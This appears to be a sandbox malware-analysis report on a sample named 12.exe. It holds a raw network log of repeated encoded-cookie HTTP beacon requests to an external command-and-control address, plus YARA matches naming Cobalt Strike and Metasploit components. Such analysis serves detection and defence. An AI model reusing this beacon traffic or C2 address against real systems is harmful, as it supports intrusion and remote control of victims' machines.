                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          57192.168.2.450016152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:45.363850117 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          58192.168.2.450022152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:48.253293991 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          59192.168.2.450029152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:51.145812988 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          60192.168.2.450036152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:54.033323050 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          61192.168.2.450045152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:56.974014044 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          62192.168.2.450050152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:59.861352921 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          63192.168.2.450056152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:02.750802040 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          64192.168.2.450063152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:05.641815901 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          65192.168.2.450067152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:08.545495987 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          66192.168.2.450068152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:11.439768076 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          67192.168.2.450069152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:14.336307049 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          68192.168.2.450070152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:17.221771002 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          69192.168.2.450071152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:20.126601934 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          70192.168.2.450072152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:23.079849958 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          71192.168.2.450073152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:26.002208948 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          72192.168.2.450074152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:28.897826910 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          73192.168.2.450075152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:31.800551891 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          74192.168.2.450076152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:34.753815889 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          75192.168.2.450077152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:37.813818932 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          76192.168.2.450078152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:41.056504965 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          77192.168.2.450079152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:43.970377922 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          78192.168.2.450080152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:46.860937119 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          79192.168.2.450081152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:49.751136065 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          80192.168.2.450082152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:52.641571045 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          81192.168.2.450083152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:55.534957886 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          82192.168.2.450084152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:31:58.470114946 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          83192.168.2.450085152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:32:01.470427990 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:13:27:56
                          Start date:26/12/2024
                          Path:C:\Users\user\Desktop\12.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\12.exe"
                          Imagebase:0x400000
                          File size:324'096 bytes
                          MD5 hash:C8C40C038A4A8541E0924520599D8C28
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:2.4%
                            Dynamic/Decrypted Code Coverage:89.5%
                            Signature Coverage:18.1%
                            Total number of Nodes:591
                            Total number of Limit Nodes:17
